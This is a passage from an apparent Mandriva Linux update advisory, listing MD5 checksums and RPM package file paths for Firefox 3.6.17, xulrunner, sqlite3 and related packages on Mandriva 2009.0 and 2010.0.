85ab3b431c7de6d7346f2af80724a1e3 2009.0/x86_64/firefox-be-3.6.17-0.1mdv2009.0.x86_64.rpm 9ac78224cc072b8a865eb57ccb44424d 2009.0/x86_64/firefox-bg-3.6.17-0.1mdv2009.0.x86_64.rpm 730388eccf9f9828f64af196ee86c5a6 2009.0/x86_64/firefox-bn-3.6.17-0.1mdv2009.0.x86_64.rpm 58a3decd3e3a3886a19dc40fb820941b 2009.0/x86_64/firefox-ca-3.6.17-0.1mdv2009.0.x86_64.rpm 5a90624d3518ba36ec55eb2a6420204b 2009.0/x86_64/firefox-cs-3.6.17-0.1mdv2009.0.x86_64.rpm db24b27132cb8dca3ea45ebcb6071712 2009.0/x86_64/firefox-cy-3.6.17-0.1mdv2009.0.x86_64.rpm a022a90fe3a6cca94340efcecb5001fe 2009.0/x86_64/firefox-da-3.6.17-0.1mdv2009.0.x86_64.rpm 4d59bf79a75d8213efc9a8f42357c4fe 2009.0/x86_64/firefox-de-3.6.17-0.1mdv2009.0.x86_64.rpm b20662cb8b1635f251d57a0833f9093e 2009.0/x86_64/firefox-devel-3.6.17-0.1mdv2009.0.x86_64.rpm 4c4cff9e136d5174633caf87334cd9cb 2009.0/x86_64/firefox-el-3.6.17-0.1mdv2009.0.x86_64.rpm 93bf8ba5a8e93c7006811d353d4c4f3d 2009.0/x86_64/firefox-en_GB-3.6.17-0.1mdv2009.0.x86_64.rpm a8b2021a6a9677c75f8ed5af7ccf9093 2009.0/x86_64/firefox-eo-3.6.17-0.1mdv2009.0.x86_64.rpm 60ae56632071590bb7b0d1f0f6a7671a 2009.0/x86_64/firefox-es_AR-3.6.17-0.1mdv2009.0.x86_64.rpm 601891ab9929ccf4ddea627b466642b5 2009.0/x86_64/firefox-es_ES-3.6.17-0.1mdv2009.0.x86_64.rpm b23dc67128474e77c02569ed3cf3d03c 2009.0/x86_64/firefox-et-3.6.17-0.1mdv2009.0.x86_64.rpm d6a6ade1469d07ea53dc0a80cd1e3ca6 2009.0/x86_64/firefox-eu-3.6.17-0.1mdv2009.0.x86_64.rpm 5b00c95f5af2960e0ae8885f81b14453 2009.0/x86_64/firefox-ext-beagle-0.3.8-13.36mdv2009.0.x86_64.rpm aa8b9f39a32280974cb7d37ef0f3365b 2009.0/x86_64/firefox-ext-blogrovr-1.1.804-0.13mdv2009.0.x86_64.rpm 90af6af5192a0523b7ca543d9b4f4d48 2009.0/x86_64/firefox-ext-mozvoikko-1.0-0.13mdv2009.0.x86_64.rpm 2ef1da56893a9ee8808c8e8a40f2855b 2009.0/x86_64/firefox-ext-scribefire-3.5.1-0.13mdv2009.0.x86_64.rpm ece9cf46ad4b8968b4804f58b9eede04 2009.0/x86_64/firefox-ext-xmarks-3.5.10-0.13mdv2009.0.x86_64.rpm c3be652781ea8fc04dd51009765a2018 2009.0/x86_64/firefox-fi-3.6.17-0.1mdv2009.0.x86_64.rpm 73b6dfa12df8d2f6d904a429a45aac6a 2009.0/x86_64/firefox-fr-3.6.17-0.1mdv2009.0.x86_64.rpm 88836378097f79cef65b842a71cc4e69 2009.0/x86_64/firefox-fy-3.6.17-0.1mdv2009.0.x86_64.rpm daa588318b69ee3223f472545e4a150c 2009.0/x86_64/firefox-ga_IE-3.6.17-0.1mdv2009.0.x86_64.rpm 1c0759836da6bd094788eef5120db5b1 2009.0/x86_64/firefox-gl-3.6.17-0.1mdv2009.0.x86_64.rpm fe4b9531eeb1fcbb37de47c73464abea 2009.0/x86_64/firefox-gu_IN-3.6.17-0.1mdv2009.0.x86_64.rpm a5981a499f181f788316c4580589ef2e 2009.0/x86_64/firefox-he-3.6.17-0.1mdv2009.0.x86_64.rpm 2550f09a264ffd4f60152fb310be2900 2009.0/x86_64/firefox-hi-3.6.17-0.1mdv2009.0.x86_64.rpm d1fbfc46c8f06b45959c5838e28a23aa 2009.0/x86_64/firefox-hu-3.6.17-0.1mdv2009.0.x86_64.rpm aaadb1c087eefe50e4bc877477abac4c 2009.0/x86_64/firefox-id-3.6.17-0.1mdv2009.0.x86_64.rpm 3314496029094186ee870f310ecab2f7 2009.0/x86_64/firefox-is-3.6.17-0.1mdv2009.0.x86_64.rpm 76dbab7b062c0bd4907c91c322c9a183 2009.0/x86_64/firefox-it-3.6.17-0.1mdv2009.0.x86_64.rpm c711dc2be8d7dc6b47680894e01da605 2009.0/x86_64/firefox-ja-3.6.17-0.1mdv2009.0.x86_64.rpm 527f62d56b9bb634de9c84317f570591 2009.0/x86_64/firefox-ka-3.6.17-0.1mdv2009.0.x86_64.rpm 6c51c819e5abc19f5d8f02efce3ba226 2009.0/x86_64/firefox-kn-3.6.17-0.1mdv2009.0.x86_64.rpm a3ab45d4da1be8b26dcbd457a3e9d3f9 2009.0/x86_64/firefox-ko-3.6.17-0.1mdv2009.0.x86_64.rpm 2e176ce5348d910c8057bc5563faf41c 2009.0/x86_64/firefox-ku-3.6.17-0.1mdv2009.0.x86_64.rpm dab82375106ffe486f47be236f8cb969 2009.0/x86_64/firefox-lt-3.6.17-0.1mdv2009.0.x86_64.rpm 48432620c19fe9808f84c5d1d38d21fe 2009.0/x86_64/firefox-lv-3.6.17-0.1mdv2009.0.x86_64.rpm 79182359d527104abc378941ccf75fad 2009.0/x86_64/firefox-mk-3.6.17-0.1mdv2009.0.x86_64.rpm cd492f6fc1b5f36bb4826f728434c6af 2009.0/x86_64/firefox-mr-3.6.17-0.1mdv2009.0.x86_64.rpm 01d8a87704b226b740c723f08ecc2d65 2009.0/x86_64/firefox-nb_NO-3.6.17-0.1mdv2009.0.x86_64.rpm d7312e9a8d543937d317c1d59b3a34a1 2009.0/x86_64/firefox-nl-3.6.17-0.1mdv2009.0.x86_64.rpm 85d01cb0516ecb676564b1054fda683d 2009.0/x86_64/firefox-nn_NO-3.6.17-0.1mdv2009.0.x86_64.rpm bb0810bd066ae8e63a58764a87e4d820 2009.0/x86_64/firefox-oc-3.6.17-0.1mdv2009.0.x86_64.rpm ddd12841f0c0f4601a4e06d2ceb2f677 2009.0/x86_64/firefox-pa_IN-3.6.17-0.1mdv2009.0.x86_64.rpm 12ac4b4f1e269138d250ca3644a1b36a 2009.0/x86_64/firefox-pl-3.6.17-0.1mdv2009.0.x86_64.rpm ae0839d18977a11b8f9dcafab4d37ad9 2009.0/x86_64/firefox-pt_BR-3.6.17-0.1mdv2009.0.x86_64.rpm 30f7df0cf5761ecbcd9c741e4766680e 2009.0/x86_64/firefox-pt_PT-3.6.17-0.1mdv2009.0.x86_64.rpm 9cc05af0f3a3f2d3d36cc7d2bb74660a 2009.0/x86_64/firefox-ro-3.6.17-0.1mdv2009.0.x86_64.rpm f1044bb9e20f353e4fc648bf0501524d 2009.0/x86_64/firefox-ru-3.6.17-0.1mdv2009.0.x86_64.rpm 84fd90488b116a7dd26787d5416b6b12 2009.0/x86_64/firefox-si-3.6.17-0.1mdv2009.0.x86_64.rpm ac187a0b46b8c1c9dc57d3ce86382dfb 2009.0/x86_64/firefox-sk-3.6.17-0.1mdv2009.0.x86_64.rpm 19102a390fef503416f6f38f53bece23 2009.0/x86_64/firefox-sl-3.6.17-0.1mdv2009.0.x86_64.rpm cc1d2bdfb6f76c667aeb1394560c9f08 2009.0/x86_64/firefox-sq-3.6.17-0.1mdv2009.0.x86_64.rpm 29900dc6cc095ac318cc64e72edd4d8b 2009.0/x86_64/firefox-sr-3.6.17-0.1mdv2009.0.x86_64.rpm b76ad7b6ddf7684a939bcea888d4a432 2009.0/x86_64/firefox-sv_SE-3.6.17-0.1mdv2009.0.x86_64.rpm 1a8c696020c195c83f64aca80bf731eb 2009.0/x86_64/firefox-te-3.6.17-0.1mdv2009.0.x86_64.rpm 239684a41f202c5edbcbf6217909e818 2009.0/x86_64/firefox-th-3.6.17-0.1mdv2009.0.x86_64.rpm 3c289ecc5ac769c4b18a381f6c8e363e 2009.0/x86_64/firefox-theme-kfirefox-0.16-0.13mdv2009.0.x86_64.rpm 3770e9c29be81d282b766d776a392a4f 2009.0/x86_64/firefox-tr-3.6.17-0.1mdv2009.0.x86_64.rpm e1c6942f3f842ae7551c96283c26e72d 2009.0/x86_64/firefox-uk-3.6.17-0.1mdv2009.0.x86_64.rpm aa519f7229db7d3dfdc217d613ebdea0 2009.0/x86_64/firefox-zh_CN-3.6.17-0.1mdv2009.0.x86_64.rpm 2e01ab4446c233d7a4e89ed1c4859274 2009.0/x86_64/firefox-zh_TW-3.6.17-0.1mdv2009.0.x86_64.rpm 39cf269b29e518aa8db16a99a43c18d7 2009.0/x86_64/gnome-python-extras-2.19.1-20.27mdv2009.0.x86_64.rpm b0ba6358ad186d93f5cf23984acdd288 2009.0/x86_64/gnome-python-gda-2.19.1-20.27mdv2009.0.x86_64.rpm c5b9d792230aea0602d696a650cf76ff 2009.0/x86_64/gnome-python-gda-devel-2.19.1-20.27mdv2009.0.x86_64.rpm b882a6e641aad7bc507beda9af730d9d 2009.0/x86_64/gnome-python-gdl-2.19.1-20.27mdv2009.0.x86_64.rpm 7fa08a97cbe98f8ad9707cb401ceef7d 2009.0/x86_64/gnome-python-gtkhtml2-2.19.1-20.27mdv2009.0.x86_64.rpm c577a096e7c627e2910d3d476a94ec95 2009.0/x86_64/gnome-python-gtkmozembed-2.19.1-20.27mdv2009.0.x86_64.rpm aefafa2fbaa7fdfb1ae7e7d484feb84b 2009.0/x86_64/gnome-python-gtkspell-2.19.1-20.27mdv2009.0.x86_64.rpm 6a4dae7f9c6b44e6c11718dce617ba4e 2009.0/x86_64/lemon-3.7.4-0.1mdv2009.0.x86_64.rpm 4befda2bfc13c141078f3b6f157ef014 2009.0/x86_64/lib64devhelp-1_0-0.21-3.25mdv2009.0.x86_64.rpm 91e5fc566a17eadf4c587ce1a7bc014b 2009.0/x86_64/lib64devhelp-1-devel-0.21-3.25mdv2009.0.x86_64.rpm 4b9faa7ba8fb0ef518ee214debf823ea 2009.0/x86_64/lib64sqlite3_0-3.7.6.2-0.1mdv2009.0.x86_64.rpm 26e89fde1f2ddfa51157f246a7a8148a 2009.0/x86_64/lib64sqlite3-devel-3.7.6.2-0.1mdv2009.0.x86_64.rpm 588a88e71749159790ab8f66f1a4b4e8 2009.0/x86_64/lib64sqlite3-static-devel-3.7.6.2-0.1mdv2009.0.x86_64.rpm abe638f2b42c8dff52fd47344d5202c5 2009.0/x86_64/lib64xulrunner1.9.2.17-1.9.2.17-0.1mdv2009.0.x86_64.rpm 368987069ca85079fbd58ec5a3fe503a 2009.0/x86_64/lib64xulrunner-devel-1.9.2.17-0.1mdv2009.0.x86_64.rpm ac35d16e378e015d39049265a1064ca6 2009.0/x86_64/mozilla-thunderbird-beagle-0.3.8-13.36mdv2009.0.x86_64.rpm 12295dfafb906d07b16e21d0773bd24a 2009.0/x86_64/sqlite3-tools-3.7.6.2-0.1mdv2009.0.x86_64.rpm cea2bac5a44774587ec4605f1cb97cbf 2009.0/x86_64/xulrunner-1.9.2.17-0.1mdv2009.0.x86_64.rpm 47f4aca2ef52ab69ac4bb90585e244f3 2009.0/x86_64/yelp-2.24.0-3.28mdv2009.0.x86_64.rpm 0972d520d57df45393b0aef2da4b12ee 2009.0/SRPMS/beagle-0.3.8-13.36mdv2009.0.src.rpm 3f8b8f723797f0fbbb5e0264bac2bfbf 2009.0/SRPMS/devhelp-0.21-3.25mdv2009.0.src.rpm ebbdbeb5e3ccb2fe3f424a327eb475ef 2009.0/SRPMS/epiphany-2.24.3-0.14mdv2009.0.src.rpm 3350215ced82f1bcf19a8e8188bf0a61 2009.0/SRPMS/firefox-3.6.17-0.1mdv2009.0.src.rpm f11029532df82e7923c4b096af98d3f0 2009.0/SRPMS/firefox-ext-blogrovr-1.1.804-0.13mdv2009.0.src.rpm 5aca99c0285a4412ecf02cf6bf946801 2009.0/SRPMS/firefox-ext-mozvoikko-1.0-0.13mdv2009.0.src.rpm dbb411ce9ba2dc5416b53aea4c6641ae 2009.0/SRPMS/firefox-ext-scribefire-3.5.1-0.13mdv2009.0.src.rpm 96e289aef5dd3795e776125a93b9a11e 2009.0/SRPMS/firefox-ext-xmarks-3.5.10-0.13mdv2009.0.src.rpm 8681188142a3360b17eae804219d934e 2009.0/SRPMS/firefox-l10n-3.6.17-0.1mdv2009.0.src.rpm 0b632cc0d32c20cb4c7458c7c20b0bcf 2009.0/SRPMS/firefox-theme-kfirefox-0.16-0.13mdv2009.0.src.rpm 82b1d9b926a7a183edd6ee0b39ee9fd8 2009.0/SRPMS/gnome-python-extras-2.19.1-20.27mdv2009.0.src.rpm 5bffe9ac14aabf83ea8b5c79f0e8e33f 2009.0/SRPMS/lemon-3.7.4-0.1mdv2009.0.src.rpm aa8e2dcac3269d9836f3dade77086e7f 2009.0/SRPMS/sqlite3-3.7.6.2-0.1mdv2009.0.src.rpm fba6a9ca071ee5648b373d678d67e352 2009.0/SRPMS/xulrunner-1.9.2.17-0.1mdv2009.0.src.rpm 4dc1a3719ef51d45d3af0be61950aef7 2009.0/SRPMS/yelp-2.24.0-3.28mdv2009.0.src.rpm Mandriva Linux 2010.0: b6a1e9e5b9e25830e9b7078924d2696e 2010.0/i586/beagle-0.3.9-20.24mdv2010.0.i586.rpm c157386b79eec41001dcae8b9133af69 2010.0/i586/beagle-crawl-system-0.3.9-20.24mdv2010.0.i586.rpm 4aef4afd0e9651ddad72b188b9351a42 2010.0/i586/beagle-doc-0.3.9-20.24mdv2010.0.i586.rpm 8832c1286824ae275dd9aa35e3ac4f1d 2010.0/i586/beagle-evolution-0.3.9-20.24mdv2010.0.i586.rpm 0e39eb8c59a596efa9315606059a1760 2010.0/i586/beagle-gui-0.3.9-20.24mdv2010.0.i586.rpm b6151aa5af9cd0a36ec8b164a0c90df4 2010.0/i586/beagle-gui-qt-0.3.9-20.24mdv2010.0.i586.rpm e21eb5e62627f34b63ef80efa85adce2 2010.0/i586/beagle-libs-0.3.9-20.24mdv2010.0.i586.rpm ce2e2fb2ac7223bdd59994a3ac2dc718 2010.0/i586/firefox-3.6.17-0.1mdv2010.0.i586.rpm c5d163ba6817bc2b58baa0c6aaade18f 2010.0/i586/firefox-af-3.6.17-0.1mdv2010.0.i586.rpm 309d34256461d7ced6f0f25e48a56ef4 2010.0/i586/firefox-ar-3.6.17-0.1mdv2010.0.i586.rpm 58abfbf8f8050c0b0964922770d41aa3 2010.0/i586/firefox-be-3.6.17-0.1mdv2010.0.i586.rpm ec582b11ef9394620eaed6132d84d839 2010.0/i586/firefox-bg-3.6.17-0.1mdv2010.0.i586.rpm 8093a30d51889561b62eed0f6a4d4e52 2010.0/i586/firefox-bn-3.6.17-0.1mdv2010.0.i586.rpm f104f48ecae85588e16845d7765cce61 2010.0/i586/firefox-ca-3.6.17-0.1mdv2010.0.i586.rpm 6a01b14ba6add339b15a1703508c491f 2010.0/i586/firefox-cs-3.6.17-0.1mdv2010.0.i586.rpm d2b01ad5090cb85cb1ee0c7ddae02e9c 2010.0/i586/firefox-cy-3.6.17-0.1mdv2010.0.i586.rpm d78c752aee982cadd936955e84a37129 2010.0/i586/firefox-da-3.6.17-0.1mdv2010.0.i586.rpm 8009736a3b595f259ed36676cfc1adcf 2010.0/i586/firefox-de-3.6.17-0.1mdv2010.0.i586.rpm cc2f5a0e41a84919685a390e50869193 2010.0/i586/firefox-devel-3.6.17-0.1mdv2010.0.i586.rpm 1f38c9f900932be64993471dd7cfa87d 2010.0/i586/firefox-el-3.6.17-0.1mdv2010.0.i586.rpm 620c598a6201f155fb66b8e8d71253bf 2010.0/i586/firefox-en_GB-3.6.17-0.1mdv2010.0.i586.rpm 44fdf2af3b0ac2497a2dccd3fe4fa6d1 2010.0/i586/firefox-eo-3.6.17-0.1mdv2010.0.i586.rpm 9bf9966d1fa20ca0a3b320e9eb67b3fb 2010.0/i586/firefox-es_AR-3.6.17-0.1mdv2010.0.i586.rpm c1afe2347d18c52e07322b4fc8cd625e 2010.0/i586/firefox-es_ES-3.6.17-0.1mdv2010.0.i586.rpm d3ddf4f0650d7faf3398c58e6f4abb9e 2010.0/i586/firefox-et-3.6.17-0.1mdv2010.0.i586.rpm 41c4ffc76147f9b79952a7372b22bfa4 2010.0/i586/firefox-eu-3.6.17-0.1mdv2010.0.i586.rpm ad261fd5e248f592a1d84ecd3f99c8f8 2010.0/i586/firefox-ext-beagle-0.3.9-20.24mdv2010.0.i586.rpm a7934e327f7c6b0faa8dd81e74b0bbba 2010.0/i586/firefox-ext-blogrovr-1.1.804-6.19mdv2010.0.i586.rpm b0a87ee3ea58549813ce53682528e344 2010.0/i586/firefox-ext-mozvoikko-1.0-6.19mdv2010.0.i586.rpm d5d1ca07987bd14a6d28b89323ac7f6d 2010.0/i586/firefox-ext-plasmanotify-0.3.1-0.14mdv2010.0.i586.rpm 458d326026b0ceb126e1881aede8c066 2010.0/i586/firefox-ext-r-kiosk-0.7.2-9.19mdv2010.0.i586.rpm c7d22e1864faceeb962dd67fbdf21335 2010.0/i586/firefox-ext-scribefire-3.5.1-0.13mdv2010.0.i586.rpm ad519aa8884647ff54ac422549d7b16e 2010.0/i586/firefox-fi-3.6.17-0.1mdv2010.0.i586.rpm b49e76476d75bad4b27770a57a04df23 2010.0/i586/firefox-fr-3.6.17-0.1mdv2010.0.i586.rpm 2fe7eb8092c120755c032e56748aa9b7 2010.0/i586/firefox-fy-3.6.17-0.1mdv2010.0.i586.rpm ce5815c669402fd42bc07d44d93c66d3 2010.0/i586/firefox-ga_IE-3.6.17-0.1mdv2010.0.i586.rpm bba69242827e981627211b2b5eb68931 2010.0/i586/firefox-gl-3.6.17-0.1mdv2010.0.i586.rpm ed338554b350057694e2a6c2d224b387 2010.0/i586/firefox-gu_IN-3.6.17-0.1mdv2010.0.i586.rpm 1b7dc5cab758801b82ac1c242da6d59c 2010.0/i586/firefox-he-3.6.17-0.1mdv2010.0.i586.rpm 007af7a298d36f8895fba605aac15803 2010.0/i586/firefox-hi-3.6.17-0.1mdv2010.0.i586.rpm 476f6ac627f82fc7f7c5543f56482796 2010.0/i586/firefox-hu-3.6.17-0.1mdv2010.0.i586.rpm 88f193ba3b7d0bef97eaac7857293a8f 2010.0/i586/firefox-id-3.6.17-0.1mdv2010.0.i586.rpm d0330a0dd7dcbd3daca42525454994ec 2010.0/i586/firefox-is-3.6.17-0.1mdv2010.0.i586.rpm b261438d53f2f8434efe2b95f7e8d954 2010.0/i586/firefox-it-3.6.17-0.1mdv2010.0.i586.rpm 3d5900d3faefb015dcb0a4d62ef16ebe 2010.0/i586/firefox-ja-3.6.17-0.1mdv2010.0.i586.rpm 292b801681eb21ecbf5778abcff89188 2010.0/i586/firefox-ka-3.6.17-0.1mdv2010.0.i586.rpm 8f540c760b340206cc3bd17698ee88df 2010.0/i586/firefox-kn-3.6.17-0.1mdv2010.0.i586.rpm c8854d6714259850dc92f7fbe6dd17dd 2010.0/i586/firefox-ko-3.6.17-0.1mdv2010.0.i586.rpm 2772412e7edd00b8174f9638cec5db4f 2010.0/i586/firefox-ku-3.6.17-0.1mdv2010.0.i586.rpm 44ad30a9e5c3b2bd10371fba4ed4d2b9 2010.0/i586/firefox-lt-3.6.17-0.1mdv2010.0.i586.rpm ed093c9f9630d13a227371a1f62495a1 2010.0/i586/firefox-lv-3.6.17-0.1mdv2010.0.i586.rpm 00712ffbbdbe194ed03bef8a891e4e57 2010.0/i586/firefox-mk-3.6.17-0.1mdv2010.0.i586.rpm 8c8a612931c31d49fc3f4ae351cd26e3 2010.0/i586/firefox-mr-3.6.17-0.1mdv2010.0.i586.rpm 91ad5facd01c4c4bd31790ca40a640ca 2010.0/i586/firefox-nb_NO-3.6.17-0.1mdv2010.0.i586.rpm b00a5e35e6ac55f895b8f6916f79bde7 2010.0/i586/firefox-nl-3.6.17-0.1mdv2010.0.i586.rpm 0ee6b29ecb2a12136b11c0608360a0a8 2010.0/i586/firefox-nn_NO-3.6.17-0.1mdv2010.0.i586.rpm e79fa37b9006461f4d0ba003b4da69b9 2010.0/i586/firefox-oc-3.6.17-0.1mdv2010.0.i586.rpm af2a2946979a450cf150eff6f2aeca15 2010.0/i586/firefox-pa_IN-3.6.17-0.1mdv2010.0.i586.rpm e2a5272606e7048adadee10f39fbe98f 2010.0/i586/firefox-pl-3.6.17-0.1mdv2010.0.i586.rpm 735f3400c0570124a70792715503ff69 2010.0/i586/firefox-pt_BR-3.6.17-0.1mdv2010.0.i586.rpm 56d8fe829854b44f4a9d7a3dad7f08e8 2010.0/i586/firefox-pt_PT-3.6.17-0.1mdv2010.0.i586.rpm db9d45c53a5ea7311dab8b6dd3136f5b 2010.0/i586/firefox-ro-3.6.17-0.1mdv2010.0.i586.rpm 16cd0acaf4cc9de46f7df27668f804c7 2010.0/i586/firefox-ru-3.6.17-0.1mdv2010.0.i586.rpm 9c79daeb7907e1050f55c77a78e68cc1 2010.0/i586/firefox-si-3.6.17-0.1mdv2010.0.i586.rpm b6d4b76f9ff21b0800839c049df430a6 2010.0/i586/firefox-sk-3.6.17-0.1mdv2010.0.i586.rpm 3826c8dea2da5b4114f440427b95e8b4 2010.0/i586/firefox-sl-3.6.17-0.1mdv2010.0.i586.rpm db491650aba41efba6874835f093f4db 2010.0/i586/firefox-sq-3.6.17-0.1mdv2010.0.i586.rpm d87fc741560c434ebf78d91df37d69c6 2010.0/i586/firefox-sr-3.6.17-0.1mdv2010.0.i586.rpm 4c2c8bf680e06a814ba26c9cf03f513c 2010.0/i586/firefox-sv_SE-3.6.17-0.1mdv2010.0.i586.rpm 2a2b280eb345b0c3f477916b9b739fe6 2010.0/i586/firefox-te-3.6.17-0.1mdv2010.0.i586.rpm 3d472d3c27158912b8aa5dfada66e6cd 2010.0/i586/firefox-th-3.6.17-0.1mdv2010.0.i586.rpm 593aabf00e5d3904c10a970adf428888 2010.0/i586/firefox-theme-kfirefox-0.16-7.18mdv2010.0.i586.rpm 59701c68cba8f4e64e7f522a3416b963 2010.0/i586/firefox-tr-3.6.17-0.1mdv2010.0.i586.rpm c8a8962b397b0bd4cf92b294d8f213ea 2010.0/i586/firefox-uk-3.6.17-0.1mdv2010.0.i586.rpm c802454f74a74d2fd062d356a10cd9fe 2010.0/i586/firefox-zh_CN-3.6.17-0.1mdv2010.0.i586.rpm 54ffb1d848372e37673ee5f0916d87a9 2010.0/i586/firefox-zh_TW-3.6.17-0.1mdv2010.0.i586.rpm e6bb0b44e75dc31a1398d8f1be3b9c05 2010.0/i586/gnome-python-extras-2.25.3-10.19mdv2010.0.i586.rpm cb3a68a90b06a8a3b1b7c4225e6a2434 2010.0/i586/gnome-python-gda-2.25.3-10.19mdv2010.0.i586.rpm 04800b57661c14843f9cb30a0bc492e8 2010.0/i586/gnome-python-gda-devel-2.25.3-10.19mdv2010.0.i586.rpm 6425c25026893e92066095be60cc4c68 2010.0/i586/gnome-python-gdl-2.25.3-10.19mdv2010.0.i586.rpm b399a0ddd65dd348f3d28bacd9c10969 2010.0/i586/gnome-python-gtkhtml2-2.25.3-10.19mdv2010.0.i586.rpm 316d34952b6a1ae3f6fc688684008621 2010.0/i586/gnome-python-gtkmozembed-2.25.3-10.19mdv2010.0.i586.rpm f291f9d540696b985058fed2bcb43f3b 2010.0/i586/gnome-python-gtkspell-2.25.3-10.19mdv2010.0.i586.rpm 03ad25d77e26d447e2eeb2172c983b70 2010.0/i586/google-gadgets-common-0.11.2-0.14mdv2010.0.i586.rpm 2668802eab633e4985ee7d5cae705998 2010.0/i586/google-gadgets-gtk-0.11.2-0.14mdv2010.0.i586.rpm 8934c0ddb3f6fadac35b13daf5d385b9 2010.0/i586/google-gadgets-qt-0.11.2-0.14mdv2010.0.i586.rpm cd109c50db0909b76bca45f7733b5d6e 2010.0/i586/lemon-3.7.4-0.1mdv2010.0.i586.rpm 591d040f58de2df829386de1f7e46afd 2010.0/i586/libggadget1.0_0-0.11.2-0.14mdv2010.0.i586.rpm 0ed830c0e017bf6daebe06e0a4fc130f 2010.0/i586/libggadget-dbus1.0_0-0.11.2-0.14mdv2010.0.i586.rpm eb51fb7f24b1af033488d8123dd63355 2010.0/i586/libggadget-gtk1.0_0-0.11.2-0.14mdv2010.0.i586.rpm e092bd005bf25082a3cd965658c44882 2010.0/i586/libggadget-js1.0_0-0.11.2-0.14mdv2010.0.i586.rpm b22e2ac3a4dc918fae6afb4c38f83be7 2010.0/i586/libggadget-npapi1.0_0-0.11.2-0.14mdv2010.0.i586.rpm e130ea57c3a32005f202924643467014 2010.0/i586/libggadget-qt1.0_0-0.11.2-0.14mdv2010.0.i586.rpm a28b0faef4a1c9f10126abf5e2e263a8 2010.0/i586/libggadget-webkitjs0-0.11.2-0.14mdv2010.0.i586.rpm 1954487379222ae6d2900f049d9c5d8e 2010.0/i586/libggadget-xdg1.0_0-0.11.2-0.14mdv2010.0.i586.rpm a142592d9ad77cbd49cdaaccbaf18ab2 2010.0/i586/libgoogle-gadgets-devel-0.11.2-0.14mdv2010.0.i586.rpm 7439c4f59d7c3e3c0c4053c8497c686d 2010.0/i586/libopensc2-0.11.9-1.19mdv2010.0.i586.rpm 000a04f5477c2191dd18aee1028658c0 2010.0/i586/libopensc-devel-0.11.9-1.19mdv2010.0.i586.rpm d108f2a27ec1602a8e3abfe85a6dd9c4 2010.0/i586/libsqlite3_0-3.7.6.2-0.1mdv2010.0.i586.rpm 25ec3dae2efdd5df8f02daf19aade1b6 2010.0/i586/libsqlite3-devel-3.7.6.2-0.1mdv2010.0.i586.rpm 98115a0368c0fff061a7c6b03ff970a6 2010.0/i586/libsqlite3-static-devel-3.7.6.2-0.1mdv2010.0.i586.rpm 306b910536bbcf02d9388bbac370cc14 2010.0/i586/libxulrunner1.9.2.17-1.9.2.17-0.1mdv2010.0.i586.rpm 3a0ab7f87d735b2788978ca7bbe21655 2010.0/i586/libxulrunner-devel-1.9.2.17-0.1mdv2010.0.i586.rpm 5d733fb6ef9990d58bc260520c2a952c 2010.0/i586/mozilla-plugin-opensc-0.11.9-1.19mdv2010.0.i586.rpm b5e5a4ff8c718c494776e9fcf387d846 2010.0/i586/mozilla-thunderbird-beagle-0.3.9-20.24mdv2010.0.i586.rpm d40e17498c9b2969d53b636f1512a981 2010.0/i586/opensc-0.11.9-1.19mdv2010.0.i586.rpm f59e41d761d46dd8ae5f0848c1268aba 2010.0/i586/sqlite3-tools-3.7.6.2-0.1mdv2010.0.i586.rpm dc8db442ddcdefb7aa85e8b7a2bd1bc1 2010.0/i586/xulrunner-1.9.2.17-0.1mdv2010.0.i586.rpm aa33ff3f1ad317179dfa58784edc5b84 2010.0/i586/yelp-2.28.0-1.21mdv2010.0.i586.rpm 872f3f5473c99556ba3676a2087618ac 2010.0/SRPMS/beagle-0.3.9-20.24mdv2010.0.src.rpm eb7c8b9b8b19f6cf7dab54a0128a7c3b 2010.0/SRPMS/firefox-3.6.17-0.1mdv2010.0.src.rpm b8a28536c5f5b90e1e56fcbccc0f7828 2010.0/SRPMS/firefox-ext-blogrovr-1.1.804-6.19mdv2010.0.src.rpm 0203c855fea4ad16b8bf3490c28a522a 2010.0/SRPMS/firefox-ext-mozvoikko-1.0-6.19mdv2010.0.src.rpm b01922e0aef070ea95b6fa98945fb685 2010.0/SRPMS/firefox-ext-plasmanotify-0.3.1-0.14mdv2010.0.src.rpm 16b3eb2d5945df96a9768051a3093b04 2010.0/SRPMS/firefox-ext-r-kiosk-0.7.2-9.19mdv2010.0.src.rpm 4e57990dc20e6089157a02b0dd7bad97 2010.0/SRPMS/firefox-ext-scribefire-3.5.1-0.13mdv2010.0.src.rpm 1e3f69cadbe70bffd1c7f7220f11792c 2010.0/SRPMS/firefox-l10n-3.6.17-0.1mdv2010.0.src.rpm 13d4fc5888b6dc2c2b7347de5ffe6282 2010.0/SRPMS/firefox-theme-kfirefox-0.16-7.18mdv2010.0.src.rpm 43f53231379e4b1ef09b31f24d329448 2010.0/SRPMS/gnome-python-extras-2.25.3-10.19mdv2010.0.src.rpm 15ead6d66f9b662b9a02a970717a5063 2010.0/SRPMS/google-gadgets-0.11.2-0.14mdv2010.0.src.rpm 24971ad45f4df34e024b071415dfe672 2010.0/SRPMS/lemon-3.7.4-0.1mdv2010.0.src.rpm 23959d528a982971b2f7e9016c3789b4 2010.0/SRPMS/opensc-0.11.9-1.19mdv2010.0.src.rpm 9de0929e70ecda34752e0ab536491e15 2010.0/SRPMS/sqlite3-3.7.6.2-0.1mdv2010.0.src.rpm 5983d5c4fe3694a9875e836334d73d98 2010.0/SRPMS/xulrunner-1.9.2.17-0.1mdv2010.0.src.rpm 4a673f357f57178cc398edbe72b749a9 2010.0/SRPMS/yelp-2.28.0-1.21mdv2010.0.src.rpm Mandriva Linux 2010.0/X86_64: 3858b66b72089446d943bcef027f17e1 2010.0/x86_64/beagle-0.3.9-20.24mdv2010.0.x86_64.rpm 2f64fc068b962ed27dffbd3166e3f13d 2010.0/x86_64/beagle-crawl-system-0.3.9-20.24mdv2010.0.x86_64.rpm a5d8e8855f04448778a942dc69e4e9ee 2010.0/x86_64/beagle-doc-0.3.9-20.24mdv2010.0.x86_64.rpm 60865274682f6fe2425b49bef9d7e125 2010.0/x86_64/beagle-evolution-0.3.9-20.24mdv2010.0.x86_64.rpm b19d9d4b3a1e4b49e70f02da179f8bcf 2010.0/x86_64/beagle-gui-0.3.9-20.24mdv2010.0.x86_64.rpm 53990e7b90d7feaa22a992ed3c69197f 2010.0/x86_64/beagle-gui-qt-0.3.9-20.24mdv2010.0.x86_64.rpm f0b3683737da726c0aed135fea2bf4ce 2010.0/x86_64/beagle-libs-0.3.9-20.24mdv2010.0.x86_64.rpm 093d44feb8368dd263d0877bcbde1555 2010.0/x86_64/firefox-3.6.17-0.1mdv2010.0.x86_64.rpm 7e3799f4a5ca1eceb6d1fd4eca83afd0 